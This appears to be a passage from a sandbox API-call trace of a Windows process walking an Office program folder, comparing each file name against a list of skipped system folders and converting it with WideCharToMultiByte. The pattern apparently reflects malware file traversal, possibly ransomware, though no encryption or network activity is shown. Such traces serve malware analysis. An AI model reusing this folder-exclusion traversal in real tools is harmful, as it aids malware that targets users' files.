[0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0143.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCANPST.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCANPST.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCANPST.EXE", lpUsedDefaultChar=0x0) returned 11 [0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0143.873] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="scdec.dll", cAlternateFileName="")) returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2=".") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="..") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="...") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="windows") returned -1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="recovery") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="perflogs") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="documents and settings") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="system volume information") returned -1 [0143.873] lstrcmpiW (lpString1="scdec.dll", lpString2="msocache") returned 1 [0143.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="scdec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="scdec.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scdec.dll", lpUsedDefaultChar=0x0) returned 9 [0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0143.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="scdec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="scdec.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scdec.dll", lpUsedDefaultChar=0x0) returned 9 [0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0143.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0143.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0143.873] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1bcd2cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe1bcd2cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee6030d6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91290, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SCNPST32.DLL", cAlternateFileName="")) returned 1 [0143.873] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2=".") returned 1 [0143.873] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="..") returned 1 [0143.873] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="...") returned 1 [0143.873] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="windows") returned -1 [0143.873] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="recovery") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="perflogs") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="documents and settings") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="system volume information") returned -1 [0143.874] lstrcmpiW (lpString1="SCNPST32.DLL", lpString2="msocache") returned 1 [0143.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST32.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0143.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST32.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0143.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0143.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0143.874] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1ba7093, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee2495d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee2e1f46, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x918f8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SCNPST64.DLL", cAlternateFileName="")) returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2=".") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="..") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="...") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="windows") returned -1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="recovery") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="perflogs") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="documents and settings") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="system volume information") returned -1 [0143.874] lstrcmpiW (lpString1="SCNPST64.DLL", lpString2="msocache") returned 1 [0143.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST64.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0143.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST64.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0143.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0143.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0143.875] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1ba7093, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee0cbdbe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee295a70, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc2c98, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SCNPST64C.DLL", cAlternateFileName="SCNPST~1.DLL")) returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2=".") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="..") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="...") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="windows") returned -1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="recovery") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="perflogs") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="documents and settings") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="system volume information") returned -1 [0143.875] lstrcmpiW (lpString1="SCNPST64C.DLL", lpString2="msocache") returned 1 [0143.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64C.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64C.DLL", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST64C.DLL", lpUsedDefaultChar=0x0) returned 13 [0143.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64C.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCNPST64C.DLL", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCNPST64C.DLL", lpUsedDefaultChar=0x0) returned 13 [0143.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0143.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0143.875] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe261555e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe261555e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe274684a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x66e70, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SELFCERT.EXE", cAlternateFileName="")) returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2=".") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="..") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="...") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="windows") returned -1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="recovery") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="perflogs") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="documents and settings") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="$RECYCLE.BIN") returned 1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="system volume information") returned -1 [0143.875] lstrcmpiW (lpString1="SELFCERT.EXE", lpString2="msocache") returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SELFCERT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SELFCERT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SELFCERT.EXE", lpUsedDefaultChar=0x0) returned 12 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SELFCERT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SELFCERT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SELFCERT.EXE", lpUsedDefaultChar=0x0) returned 12 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0143.876] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf637b042, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x72b8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SENDTO.DLL", cAlternateFileName="")) returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2=".") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="..") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="...") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="windows") returned -1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="recovery") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="perflogs") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="documents and settings") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="system volume information") returned -1 [0143.876] lstrcmpiW (lpString1="SENDTO.DLL", lpString2="msocache") returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SENDTO.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SENDTO.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SENDTO.DLL", lpUsedDefaultChar=0x0) returned 10 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SENDTO.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SENDTO.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SENDTO.DLL", lpUsedDefaultChar=0x0) returned 10 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0143.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0143.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0143.876] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf158c060, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SEQCHK10.DLL", cAlternateFileName="")) returned 1 [0143.876] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2=".") returned 1 [0143.876] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="..") returned 1 [0143.876] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="...") returned 1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="windows") returned -1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="recovery") returned 1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="perflogs") returned 1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="documents and settings") returned 1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="system volume information") returned -1 [0143.877] lstrcmpiW (lpString1="SEQCHK10.DLL", lpString2="msocache") returned 1 [0143.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SEQCHK10.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SEQCHK10.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SEQCHK10.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SEQCHK10.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SEQCHK10.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SEQCHK10.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0143.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0143.877] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1de33ea, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe1de33ea, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe231a70f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfa70, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SETLANG.EXE", cAlternateFileName="")) returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2=".") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="..") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="...") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="windows") returned -1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="recovery") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="perflogs") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="documents and settings") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="$RECYCLE.BIN") returned 1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="system volume information") returned -1 [0143.877] lstrcmpiW (lpString1="SETLANG.EXE", lpString2="msocache") returned 1 [0143.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG.EXE", lpUsedDefaultChar=0x0) returned 11 [0143.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0143.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG.EXE", lpUsedDefaultChar=0x0) returned 11 [0143.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0143.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.878] FindNextFileW (in: 